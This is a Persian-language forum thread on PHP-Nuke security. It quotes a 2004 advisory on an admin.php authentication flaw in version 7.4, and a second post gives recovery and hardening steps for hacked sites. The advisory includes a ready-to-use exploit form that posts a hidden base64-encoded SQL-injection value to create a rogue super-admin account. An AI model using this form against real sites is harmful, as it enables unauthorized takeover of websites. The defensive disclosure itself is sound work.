گزارش حفره هاي ناك و راه مقابله با آن

G

guilanict

Member
شايد تا كنون تاپيكهاي بسياري در اين زمينه باز شده باشد ولي اينبار مي خواهم از كليه دوستاني كه در زمينه امنيت كار مي كنند خواهش كنم اطلاعات خودشان را در اين تاپيك مطرح كنند تا بنوعي سايتهاي مبتني بر ناك بتوانند خود را در برابر حملات هكرها محافظت نمايند.
امروز دوست عزيزي اين حفره را گزارش داد كه متن كامل آن را در زير مي بينيد:

کد: 
PHP-Nuke Authentication Flaw in 'admin.php' Lets Remote Users Gain Administrative Privileges 
   
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)  
Date:  Sep 5 2004 
 
Impact:  Modification of user information, User access via network
 
Exploit Included:  Yes   
 
Version(s): 7.4 
 
Description:  An authentication vulnerability was reported in PHP-Nuke in the 'admin.php' script. A remote user can create a user account that has administrative privileges. 

CODEBUG Labs reported that a remote user can submit a specially crafted POST request to 'admin.php' to add a user account and grant administrative privileges to that user account.

A demonstration exploit HTTP form is provided:

<form name="mantra" method="POST" action="http://www.sitewithphpnuke.com/admin.php">
<p>USERNAME: 
<input type="text" name="add_aid">
<br>
NOME: 
<input type="text" name="add_name">
<br>
PASSWORD: 
<input type="text" name="add_pwd">
<br>
E-MAIL: 
<input type="text" name="add_email">
<br>
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<br>
<input type="hidden" name="add_radminsuper" value="1">
<br>
<input type="hidden" name="op" value="AddAuthor">
</p>
<p>
<input type="submit" name="Submit" value="Create Admin">
<br>
</p>
</form>

The original advisory is available at:

http://www.mantralab.org/modules.php/modulo/news/lanotizia/%5BXSS%5D+Remote+privilege+escalation+in+PHP-Nuke+7.4 
 
Impact:  A remote user can add an administrative account to gain administrative access to PHP-Nuke on the target system.
 
Solution:  No solution was available at the time of this entry.
 
Vendor URL:  [url]www.phpnuke.org/[/url] (Links to External Site) 
 
Cause:  Authentication error 
 
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
 
Reported By:  Pierquinto Manco <[email protected]>
 
Message History:   None.
 
G

guilanict

Member
اين هم راهنمايي مدير ناك كوپ در هنگام هك گرفتگي: :)
کد: 
New unauthorized admin account has been created 

Run your database tool (e.g. phpMyAdmin). 

Open a database belongs to PHP-Nuke tables. In phpMyAdmin, it listed in left side panel. 

Open {nuke}_authors table, replace {nuke} with your actual $prefix name defined in config.php. 

Delete all records listed in this table. 

Close/logout from your database tool. 

Go to your site and run admin.php. 

When prompted, enter new admin account (admin nick, name, password, email, etc). 

Done. 


If you has no database tool or has no idea on how to use it, create the script below and save it as emptyadmins.php then upload to your PHP-Nuke root directory. 
Code: 
<?php 
require_once("mainfile.php"); 
if (!isset($prefix)) die('config.php not loaded properly.'); 
if (!isset($db)) die('database layer not loaded properly.'); 

$sql = "DELETE FROM " . $prefix . "_authors"; 
$result = $db->sql_query($sql); 
if ($result) { 
  echo "All administrator accounts has been removed.<br/>"; 
  echo "Now run admin.php to create new admin account."; 
} else { 
  echo "Unable to access to database."; 
} 
?> 

Then, run this script from your browser, e.g: 
Code: 
http://mysite.com/emptyadmins.php 

 Remove/delete the script when no loger needed.  


My index.php has been tampered or showing a hacker message 

Login as admin, and go to PHP-Nuke administration menu. 

Click on "Messages" icon. 

Check foe every site messages by clicking on "edit" link. 

Remove any unnecessary message text, or delete the message. 

Done. 



A frame shown at the bottom of my site's page 

Login as admin, and go to PHP-Nuke administration menu. 

Click on "Preferences" icon. 

Remove any unnecessary foot text. 

Done. 



One or some of your script files has changed 

Replace modified file with original one on your local machine. 

Patch or upgrade your modules that containing upload feature. 



Securing PHP-Nuke 

Apply patches for your current PHP-Nuke version. (nukesecurity resources) 

Install one or more PHP-Nuke security add-ons: (alphabetical orders) 

Admin Secure, Forums: home, nukecops 

Fortress, Forums: computercops, nukecops 

Protector System, Forums: home, nukecops 

NSN Sentinel, Forums: home, nukegalaxy, nukecops 



Check for Hacker Assassins PHP-Nuke combo package that shipped with latest ChatServ's patches and some security add-ons. 

Keep watching on Waraxe Forum for PHP-Nuke expoits. 

Visit some security sites such as Security Tracker, Security Focus, and Secunia for latest advisories regarding to PHP-Nuke exploits and vulnerabilities. 

Keep monitoring for new and upcoming PHP-Nuke exploits and vulnerabilities. 



Which the best security add-on suitable for my site? 
KGuske has a comparison table for common PHP-Nuke security add-on. 
Visit this link for more details: http://www.freesoftwarereviews.org/modules.php?name=News&file=article&sid=2
 
برای ارسال پاسخ شما باید وارد سیستم شوید.

آخرین مطالب مجیدآنلاین

جدیدترین ارسال ها

بالا